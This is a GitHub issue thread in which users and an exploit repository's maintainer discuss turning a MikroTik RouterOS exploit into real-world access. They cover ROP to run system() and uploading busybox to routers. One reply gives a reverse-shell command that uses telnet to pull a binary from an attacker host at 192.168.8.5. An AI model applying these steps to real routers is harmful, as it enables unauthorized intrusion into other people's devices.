-
Notifications
You must be signed in to change notification settings - Fork 217
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
How to exploit it in real world? #6
Comments
I think this request is out of the scope of this repo. |
Hi BigNerd, the cuestion is how upload an busybox or tinyshell from remotely and create the rc.d, run.d and the bash file whitout mount the sda, Thanks for your great work, greetings! 💪 |
Look at this line of code: I passed the http request to the stdin of netcat |
Anyway |
Or another easy way is to edit the reverse shell command with something like this: "/bin/telnet 192.168.8.5 1234 > /ram/busybox" And open netcat on the pc with this: This should be able to upload the binary |
Thanks for your answer, did not achieve remote command execution, Cool It is true this can also work with telnet 🏄
Test: |
May you test usign 6.38.4? |
Try to make it crash before stack clash |
All my code is for python3 Anyway in put the shebang in the first line of my scripts |
You're right, it happens that I have not made them executable, excuse my ignorance, thanks for the information, i not read the shebang. I found a fork for python 3 of pwntools |
I can upload busybox to the VM on RouterOS 6.35.4 but i don't get how can i get a shell with busybox runnig. Thanks for th help in advance |
@SrSands you mean you can connect to the shell but don't know how to use the newly uploaded busybox?
I think you can add the aliases to startup scripts somehow. Not sure. The other option is to write softlinks for the commands under Also this guy made an automated "jailbreak" that installs busybox and enables devel-login: https://github.com/0ki/mikrotik-tools edit Hmm... so I guess this is their setup script router side: Basically copy busybox to |
Simply copy the the new busybox in
I dont know why you do not read my README.md |
The PATH already contains |
@BigNerd95 thanks, the telnet upload wasn't working for me so I guess I didn't read past that part ^^;; Btw I don't have
edit After I did the steps for a persistent install manually, it appeared in PATH :)) |
@BigNerd95 Thanks, i didn't pay attention to the reverse telnet but anyway I'm going to try both methods EDIT I tried the persistent telnet example but keeps failing asking me for the ropper module although i I installed it from the git repository i think is a error from my end and im still working on it (i dont have as much free time as i want) |
Thanks for the help @BigNerd95 & @tostercx but every time that i try to interact with busybox-mips I get: don't know what I'm doing wrong If anyone can help me a little i would be thankful |
If you receive these three "not found" it's normal |
Then maybe is a problem whit the busybox version because its happening this: chmod 777 /flash/bin/busybox-mips Thanks in advance |
export PATH=/flash/bin:$PATH |
Getting the same result :( chmod 777 /flash/bin/busybox-mips |
Try with: /flash/bin/ls -l |
Same result /flash/bin/ls -l |
Now I can run system() by rop, but I don't know how to exploit it without add our busybox, Because the default busybox only support few command.
The text was updated successfully, but these errors were encountered: